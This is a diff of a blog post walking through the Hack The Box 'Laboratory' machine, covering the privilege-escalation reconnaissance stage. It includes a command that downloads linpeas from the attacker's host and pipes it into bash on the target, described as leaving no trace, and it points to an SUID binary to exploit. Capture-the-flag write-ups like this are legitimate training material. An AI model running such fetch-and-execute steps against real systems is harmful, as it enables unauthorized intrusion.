vandycknick/nvd.codes/_posts/2021/2021-05-13-hack-the-box-laboratory.md

 dexter@laboratory:~$ ls
 user.txt
 dexter@laboratory:~$
 ```

-To do some reconnaissance, you can download `linpeas.sh` directly onto the box by hosting a webserver on your local machine with `python -m http.server`.
-Piping it directly into bash kicks off the scan instantly and doesn't leave any trace behind on the machine.
-Looking through the results, it shows an interesting SUID binary that isn't usually on a Linux system and that is owned by the `dexter` user.
-I truncated the result, but an SUID binary can be detected by the `s` within the file permissions of the output of an `ls` command.
+Let's run [linpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) on the machine to get an idea of where we need to focus our efforts next.
+Hack the box machine don't have internet access, so the best way to get this up and running is to download `linpeas.sh` on your host machine and expose it by hosting a webserver with `python -m http.server`.
+Then we can use curl to download the script and pipe it directly to bash to let it do its thing.
+The results show an interesting SUID binary that isn't usually on a Linux system, and the `dexter` user owns that.
+I truncated the output, but a SUID binary can be detected by the `s` within the file permissions of the output of an `ls` command.
 A SUID binary gets executed as the root user without asking for a password, meaning it is an exciting target for us to try and exploit.

 ```sh
 $ curl -L http://10.10.14.19:8000/linpeas.sh | bash